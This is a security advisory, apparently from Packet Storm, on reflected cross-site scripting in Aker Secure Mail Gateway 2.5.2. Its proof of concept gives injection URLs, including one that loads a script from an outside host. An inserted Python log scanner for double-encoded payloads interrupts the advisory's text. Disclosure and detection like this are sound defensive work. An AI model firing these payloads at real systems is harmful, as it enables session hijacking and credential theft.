AKER Secure Mail Gateway 2.5.2 Cross Site Scripting

2014-03-07T00:00:00
ID PACKETSTORM:125599
Type packetstorm
Reporter William Costa
Modified 2014-03-07T00:00:00

Description

                                        
`XSS in the URL for access to Confirmation Required in the antispam box from  
the company AKER (CVE-2013-6037)  
  
I. VULNERABILITY  
-------------------------  
Reflected XSS vulnerabilities in AKER SECURE MAIL GATEWAY <= v2.5.2  
  
II. BACKGROUND  
-------------------------  
The Aker Secure Mail Gateway is a complete e-mail security platform.  
  
III. DESCRIPTION  
-------------------------  
A reflected XSS vulnerability has been detected in Aker Secure Mail Gateway  
<= 2.5.2 that allows arbitrary HTML/script code to be executed in the  
context of the victim user's browser.  
The code injection is done through the parameters "msg_id" and "content" in  
the page index.php.  
  
  
IV. PROOF OF CONCEPT  
-------------------------  
The application does not validate the double encoding of the "msg_id"  
parameter correctly.  
Malicious Request ("msg_id"):  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script>alert(String(/XSS/).substr(1,6)  
); </script>  
Vulnerable:  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script  
src=http://10.0.1.142:5005/xook.js></script>  
Vulnerable:  
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><iframe  
src=http://www.google.com> </iframe>  
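
Added example (not part of the original advisory and not Aker's code): a log check for the double-encoding issue described above, which percent-decodes "msg_id" and "content" on /webgui/cf/index.php until the value is stable and flags anything that then contains markup. Assumptions: a legitimate msg_id is purely alphanumeric (as in the sample value above), the web server writes combined-format access logs, and the function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

TARGET_PATH = "/webgui/cf/index.php"      # page named in the advisory
TOKEN = re.compile(r"[A-Za-z0-9]+")       # assumed shape of a legitimate msg_id
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MAX_ROUNDS = 5                            # bound on repeated percent-decoding

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Mar/2014:10:00:01 +0000] "GET /webgui/cf/index.php?msg_id=89f52f83bd0a11 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [07/Mar/2014:10:02:13 +0000] "GET /webgui/cf/index.php?msg_id=89f52f83bd0a11%252F%253E%253Ci%253E HTTP/1.1" 200 5312',
    '192.0.2.44 - - [07/Mar/2014:10:02:19 +0000] "GET /webgui/cf/index.php?msg_id=89f52f83bd0a11&content=%3Ci%3Ehello HTTP/1.1" 200 5290',
    '192.0.2.77 - - [07/Mar/2014:10:05:40 +0000] "GET /index.html?msg_id=%3Ci%3E HTTP/1.1" 404 312',
]

def fully_decode(value):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def suspicious_params(target):
    """Findings for one request target as (param, decode_rounds, decoded_value)."""
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return []
    findings = []
    for pair in parts.query.split("&"):   # split raw, so decoding is ours alone
        name, _, raw = pair.partition("=")
        value, rounds = fully_decode(raw)
        bad_id = name == "msg_id" and not TOKEN.fullmatch(value)
        bad_content = name == "content" and re.search(r"[<>]", value)
        if bad_id or bad_content:
            findings.append((name, rounds, value))
    return findings

def scan(lines):
    """Map line number -> findings for every log line that trips a check."""
    hits = {}
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = suspicious_params(match.group(1)) if match else []
        if found:
            hits[number] = found
    return hits
```

A decode count of 2 or more in a finding means the value was encoded more than once, which is the case the advisory says the application mishandles.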
  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser; this can be leveraged to steal sensitive information such  
as user credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Aker Secure Mail Gateway <= v2.5.2  
  
VII. SOLUTION  
-------------------------  
http://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp  
  
References  
  
http://www.kb.cert.org/vuls/id/687278  
http://www.aker.com.br/  
http://www.aker.com.br/produtos/aker-secure-mail-gateway  
http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All  
  
By Wiliam Costa  
`